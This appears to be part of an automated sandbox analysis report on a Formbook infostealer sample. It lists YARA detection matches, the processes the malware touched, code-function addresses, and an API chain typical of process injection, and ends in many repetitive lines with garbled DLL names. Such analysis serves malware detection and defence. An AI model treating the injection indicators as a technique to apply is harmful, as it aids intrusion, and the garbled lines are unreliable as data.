              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 5112, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
              Source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: chkdsk.exe PID: 6856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A48A50_3_026A48A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A48A50_3_026A48A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A48A50_3_026A48A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B21600_2_032B2160
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032FC5200_2_032FC520
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032E3E180_2_032E3E18
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032BDD170_2_032BDD17
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B9E4C3_2_068B9E4C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B9E503_2_068B9E50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B2FB03_2_068B2FB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CE7573_2_068CE757
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B2D903_2_068B2D90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B10303_2_068B1030
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E649EB03_2_1E649EB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FFF093_2_1E6FFF09
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E603FD23_2_1E603FD2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E603FD53_2_1E603FD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FFFB13_2_1E6FFFB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F923_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B9C323_2_1E6B9C32
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FFCF23_2_1E6FFCF2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F7D733_2_1E6F7D73
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D403_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FDC03_2_1E65FDC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3A6C3_2_1E6B3A6C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FFA493_2_1E6FFA49
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F7A463_2_1E6F7A46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDAC63_2_1E6EDAC6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E685AA03_2_1E685AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA33_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FFB763_2_1E6FFB76
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B5BF03_2_1E6B5BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E67DBF93_2_1E67DBF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FB803_2_1E65FB80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6AD8003_2_1E6AD800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E03_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6499503_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65B9503_2_1E65B950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D59103_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6856303_2_1E685630
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F16CC3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FF7B03_2_1E6FF7B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6314603_2_1E631460
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FF43F3_2_1E6FF43F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F75713_2_1E6F7571
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DD5B03_2_1E6DD5B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E12ED3_2_1E6E12ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65B2C03_2_1E65B2C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6452A03_2_1E6452A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D34C3_2_1E62D34C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F132D3_2_1E6F132D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E68739A3_2_1E68739A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F70E93_2_1E6F70E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FF0E03_2_1E6FF0E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF0CC3_2_1E6EF0CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6470C03_2_1E6470C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E67516C3_2_1E67516C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F1723_2_1E62F172
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B16B3_2_1E70B16B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64B1B03_2_1E64B1B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E640E593_2_1E640E59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FEE263_2_1E6FEE26
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FEEDB3_2_1E6FEEDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E652E903_2_1E652E90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FCE933_2_1E6FCE93
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B4F403_2_1E6B4F40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E682F283_2_1E682F28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E660F303_2_1E660F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E2F303_2_1E6E2F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64CFE03_2_1E64CFE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E632FC83_2_1E632FC8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BEFA03_2_1E6BEFA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E640C003_2_1E640C00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E630CF23_2_1E630CF2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E0CB53_2_1E6E0CB5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64AD003_2_1E64AD00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DCD1F3_2_1E6DCD1F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63ADE03_2_1E63ADE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E658DBF3_2_1E658DBF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63EA803_2_1E63EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FAB403_2_1E6FAB40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F6BD73_2_1E6F6BD7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64A8403_2_1E64A840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6428403_2_1E642840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66E8F03_2_1E66E8F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6268B83_2_1E6268B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6569623_2_1E656962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6429A03_2_1E6429A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70A9A63_2_1E70A9A6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65C6E03_2_1E65C6E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6407703_2_1E640770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6647503_2_1E664750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63C7C03_2_1E63C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F24463_2_1E6F2446
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E44203_2_1E6E4420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EE4F63_2_1E6EE4F6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6405353_2_1E640535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E7005913_2_1E700591
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E02743_2_1E6E0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C02C03_2_1E6C02C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FA3523_2_1E6FA352
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64E3F03_2_1E64E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E7003E63_2_1E7003E6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D20003_2_1E6D2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C81583_2_1E6C8158
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6301003_2_1E630100
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DA1183_2_1E6DA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F81CC3_2_1E6F81CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F41A23_2_1E6F41A2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E7001AA3_2_1E7001AA
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330CB08 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0330CB08
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ?????.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???r????i.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
